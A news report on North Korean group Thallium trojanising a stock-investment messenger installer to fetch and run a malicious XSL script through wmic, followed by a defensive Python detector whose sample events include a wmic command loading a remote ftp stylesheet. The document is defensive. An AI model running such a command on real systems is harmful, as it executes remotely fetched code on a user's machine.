North Korean software supply chain attack targets stock investors
North Korean hacking group Thallium has targeted users of a private stock investment messenger service in a software supply chain attack, according to a report published this week.
Attackers alter the installer of a stock investment app.
Within the legitimate installer of the stock investment platform, attackers injected specific commands that fetched a malicious XSL script from a rogue FTP server and executed it on Windows systems via the built-in wmic utility.
Excel macros also used to deliver the payload.
ESTsecurity researchers also observed Microsoft Office documents, such as Excel spreadsheets containing macros, distributing the aforementioned XSL script payload. "ESRC is paying attention to the fact that the Thallium organization is using the 'XSL Script Processing' technique not only in spear phishing attacks based on malicious documents, but also for niche attacks including supply chain attacks," stated ESTsecurity researchers in their translated report.
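For defenders, both delivery paths described above (the altered installer and the macro documents) end in wmic processing an XSL stylesheet, which wmic accepts through its `/format:` switch. The following detection sketch is an added example, not code from the report or from ESTsecurity; it assumes process-creation events exported as dictionaries with Sysmon-style `Image`, `CommandLine` and `ParentImage` fields, and every host, path and file name in the sample events is constructed.

```python
import re
from ntpath import basename  # Windows path rules on any OS

# /format:<value>, where the value may be quoted
FORMAT_RE = re.compile(r'/format\s*:\s*(?:"([^"]+)"|(\S+))', re.IGNORECASE)
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.IGNORECASE)

def classify_format(cmdline):
    """Return a verdict when /format: names a stylesheet file, else None."""
    m = FORMAT_RE.search(cmdline)
    if not m:
        return None
    value = m.group(1) or m.group(2)
    if SCHEME_RE.match(value) or value.startswith("\\\\"):
        return "remote-stylesheet"          # URL or UNC path
    if "\\" in value or "/" in value or value.lower().endswith(".xsl"):
        return "local-stylesheet-file"      # path on disk, not a format keyword
    return None                             # bare keyword such as csv or list

def scan(events):
    """Return (verdict, parent process, command line) for each suspicious wmic run."""
    findings = []
    for ev in events:
        if basename(ev["Image"]).lower() != "wmic.exe":
            continue
        verdict = classify_format(ev["CommandLine"])
        if verdict:
            findings.append((verdict, basename(ev["ParentImage"]), ev["CommandLine"]))
    return findings

# Constructed sample events (hypothetical hosts, paths and file names)
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic os get caption /format:csv",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic os get /format:"ftp://files.example.invalid/style.xsl"',
     "ParentImage": r"C:\Users\user\Downloads\messenger_setup.exe"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic process list /FORMAT:C:\Users\Public\report.xsl",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c echo /format:x.xsl",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for verdict, parent, cmdline in scan(SAMPLE_EVENTS):
        print(f"{verdict:22} parent={parent:20} {cmdline}")
```

The parent process in each finding is what separates an administrator's ad hoc query from wmic being launched by an installer or an Office application.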
Whether the goal behind this attack was monetary gain or espionage on traders, supply chain attacks have become a common nuisance of these times.
Last month, attackers targeted the open-source ecosystem RubyGems in a software supply chain attack to steal cryptocurrency from infected machines.